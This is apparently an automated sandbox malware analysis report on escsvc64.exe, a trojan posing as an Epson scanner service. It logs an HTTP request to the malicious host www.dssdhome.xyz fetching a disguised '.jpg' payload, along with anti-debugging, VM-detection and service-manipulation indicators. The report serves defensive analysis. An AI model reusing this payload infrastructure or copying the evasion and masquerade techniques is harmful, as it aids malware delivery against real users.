Edit tour

Windows Analysis Report
escsvc64.exe

Overview

General Information

Sample name:	escsvc64.exe
Analysis ID:	1590615
MD5:	525ea9523a2afe76d2eaebc4a6b923eb
SHA1:	e0e30f49e82505caf9e7852a1071bbce81d8fcdc
SHA256:	53c772ca6258ee6a1d53be5e66554d0793f92c631760f1e3ed31366ef4fccba7
Tags:	exemalwaretrojanuser-Joker
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Performs DNS queries to domains with low reputation

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to get notified if a device is plugged in / out

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

escsvc64.exe (PID: 4692 cmdline: "C:\Users\user\Desktop\escsvc64.exe" MD5: 525EA9523A2AFE76D2EAEBC4A6B923EB)

WerFault.exe (PID: 6308 cmdline: C:\Windows\system32\WerFault.exe -u -p 4692 -s 1416 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T11:26:06.831941+0100	2028371	3	Unknown Traffic	192.168.2.7	49702	212.102.46.118	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: escsvc64.exe

Virustotal: Detection: 6%

Perma Link

Source: unknown

HTTPS traffic detected: 212.102.46.118:443 -> 192.168.2.7:49702 version: TLS 1.2

Source:	Binary string: d:\PROJECTS\ESCSVC\ESCSVC_DEV\x64\Release\EscSvc64.pdb! source: escsvc64.exe
Source:	Binary string: C:\Users\Administrator\source\repos\Dll1\x64\Release\Dll1.pdb source: escsvc64.exe, escsvc64.exe, 00000000.00000002.1718089864.0000000180012000.00000002.00001000.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000002.1717805298.00000000027A0000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000002.1717618022.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: d:\PROJECTS\ESCSVC\ESCSVC_DEV\x64\Release\EscSvc64.pdb source: escsvc64.exe

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_0000000140001460 CreateEventW,CreateEventW,RegisterDeviceNotificationW,SetServiceStatus,WaitForMultipleObjects,UnregisterDeviceNotification,CloseHandle,CloseHandle,

0_2_0000000140001460

Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	0_2_0000000140003FEC
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	0_2_000000014000420E
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	0_2_0000000140004012
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 4x nop then mov rcx, qword ptr [rbx]	0_2_0000000140001080
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	0_2_00000001400040A9
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	0_2_0000000140004112
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	0_2_000000014000438B
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 4x nop then or byte ptr [rax-01h], 00000008h	0_2_0000000140005390

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.dssdhome.xyz

Source: global traffic

TCP traffic: 192.168.2.7:49497 -> 162.159.36.2:53

Source: Joe Sandbox View

IP Address: 212.102.46.118 212.102.46.118

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 212.102.46.118:443

Source: global traffic

HTTP traffic detected: GET /11/xin/escsvc64.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Linux i644 ; en-US) Gecko/20100101 Firefox/70.2Host: www.dssdhome.xyz

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /11/xin/escsvc64.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Linux i644 ; en-US) Gecko/20100101 Firefox/70.2Host: www.dssdhome.xyz

Source: global traffic	DNS traffic detected: DNS query: www.dssdhome.xyz
Source: global traffic	DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa

Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net
Source: escsvc64.exe, 00000000.00000002.1717351148.0000000000495000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1259786881.0000000000495000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dssdhome.xyz/
Source: escsvc64.exe, 00000000.00000002.1717351148.0000000000476000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1258259304.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dssdhome.xyz/11/xin/escsvc64.jpg
Source: escsvc64.exe, 00000000.00000002.1717351148.0000000000476000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dssdhome.xyz:443/11/xin/escsvc64.jpg

Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: unknown

HTTPS traffic detected: 212.102.46.118:443 -> 192.168.2.7:49702 version: TLS 1.2

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_0000000140001890 OpenSCManagerW,OpenServiceW,ControlService,Sleep,QueryServiceStatus,Sleep,QueryServiceStatus,DeleteService,CloseServiceHandle,CloseServiceHandle,

0_2_0000000140001890

Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_000000014000F210	0_2_000000014000F210
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_000000014000EA40	0_2_000000014000EA40
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_000000014000BE40	0_2_000000014000BE40
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140003040	0_2_0000000140003040
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140008E50	0_2_0000000140008E50
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140007450	0_2_0000000140007450
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140001460	0_2_0000000140001460
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140009660	0_2_0000000140009660
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_000000014000C460	0_2_000000014000C460
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140001C90	0_2_0000000140001C90
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140002090	0_2_0000000140002090
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_000000014000DCB0	0_2_000000014000DCB0
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140008D00	0_2_0000000140008D00
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_000000014000B7C0	0_2_000000014000B7C0
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_01FD0040	0_2_01FD0040
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_01FD11A8	0_2_01FD11A8
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_01FD14F8	0_2_01FD14F8
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_01FDA230	0_2_01FDA230
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_00000001800015D0	0_2_00000001800015D0
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000180001280	0_2_0000000180001280

Source: C:\Users\user\Desktop\escsvc64.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4692 -s 1416

Source: escsvc64.exe

Static PE information: invalid certificate

Source: escsvc64.exe

Binary or memory string: OriginalFilename vs escsvc64.exe

Source: classification engine

Classification label: mal52.troj.winEXE@2/5@2/1

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: GetModuleFileNameW,OpenSCManagerW,CreateServiceW,CloseServiceHandle,CloseServiceHandle,

0_2_0000000140001620

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_00000001400024A0 Sleep,CoInitialize,CoCreateInstance,Sleep,CoUninitialize,

0_2_00000001400024A0

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_0000000140001080 GetCommandLineW,CommandLineToArgvW,LocalFree,StartServiceCtrlDispatcherW,GetLastError,

0_2_0000000140001080

Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140001080 GetCommandLineW,CommandLineToArgvW,LocalFree,StartServiceCtrlDispatcherW,GetLastError,		0_2_0000000140001080
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000180001C10 StartServiceCtrlDispatcherW,		0_2_0000000180001C10

Source: C:\Windows\System32\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4692

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\b90f21ef-4238-40f2-8686-e7c4250680fa

Jump to behavior

Source: escsvc64.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\escsvc64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: escsvc64.exe

Virustotal: Detection: 6%

Source: escsvc64.exe	String found in binary or memory: /INSTALL
Source: escsvc64.exe	String found in binary or memory: /INSTALL/START/REMOVEEpsonScanSvcEpson Scanner ServiceSOFTWARE\WOW6432Node\EPSON\EPSON ScanSupported,SOFTWARE\WOW6432Node\EPSON\EPSON Scan\%sEventNumEventAppNameEventAppPath%s,%dWIN_DIR1%s\%sPROGx86_DIR0ProgramFiles(x86)PROG_DIR<unknown>EsDevApp.exeRSDSV

Source: unknown	Process created: C:\Users\user\Desktop\escsvc64.exe "C:\Users\user\Desktop\escsvc64.exe"
Source: C:\Users\user\Desktop\escsvc64.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4692 -s 1416

Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: wtsapi32.dll	Jump to behavior

Source: escsvc64.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: escsvc64.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: d:\PROJECTS\ESCSVC\ESCSVC_DEV\x64\Release\EscSvc64.pdb! source: escsvc64.exe
Source:	Binary string: C:\Users\Administrator\source\repos\Dll1\x64\Release\Dll1.pdb source: escsvc64.exe, escsvc64.exe, 00000000.00000002.1718089864.0000000180012000.00000002.00001000.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000002.1717805298.00000000027A0000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000002.1717618022.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: d:\PROJECTS\ESCSVC\ESCSVC_DEV\x64\Release\EscSvc64.pdb source: escsvc64.exe

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_000000014000CF60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_000000014000CF60

Source: escsvc64.exe

Static PE information: real checksum: 0x28b76 should be: 0x2d375

Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_00000001400079EC push rdx; ret	0_2_0000000140007A01
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140007BFA push rdx; ret	0_2_0000000140007C01
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140007AE7 push rdx; ret	0_2_0000000140007AF1
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140007976 push rdx; ret	0_2_00000001400079C9
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140007B77 push rdx; ret	0_2_0000000140007B79
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_01FE8086 push ecx; retf 003Fh	0_2_01FE80E6

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_0000000140001080 GetCommandLineW,CommandLineToArgvW,LocalFree,StartServiceCtrlDispatcherW,GetLastError,

0_2_0000000140001080

Source: C:\Users\user\Desktop\escsvc64.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\escsvc64.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-18822

Source: C:\Users\user\Desktop\escsvc64.exe

API coverage: 7.0 %

Source: C:\Users\user\Desktop\escsvc64.exe TID: 6996

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: escsvc64.exe, 00000000.00000002.1717351148.00000000004D3000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1260063832.00000000004D3000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1258259304.00000000004D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: escsvc64.exe, 00000000.00000002.1717351148.0000000000476000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\escsvc64.exe

API call chain: ExitProcess graph end node

graph_0-18823

Source: C:\Users\user\Desktop\escsvc64.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_0000000140004A40 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0000000140004A40

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_000000014000CF60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_000000014000CF60

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_00000001400032A0 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00000001400032A0

Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140004A40 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0000000140004A40
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140004AE0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0000000140004AE0
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_000000014000E7D0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_000000014000E7D0
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140002BE0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0000000140002BE0

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: GetLocaleInfoA,

0_2_000000014000DF90

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_0000000140008860 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0000000140008860

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_00000001400032A0 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00000001400032A0

Source: C:\Users\user\Desktop\escsvc64.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
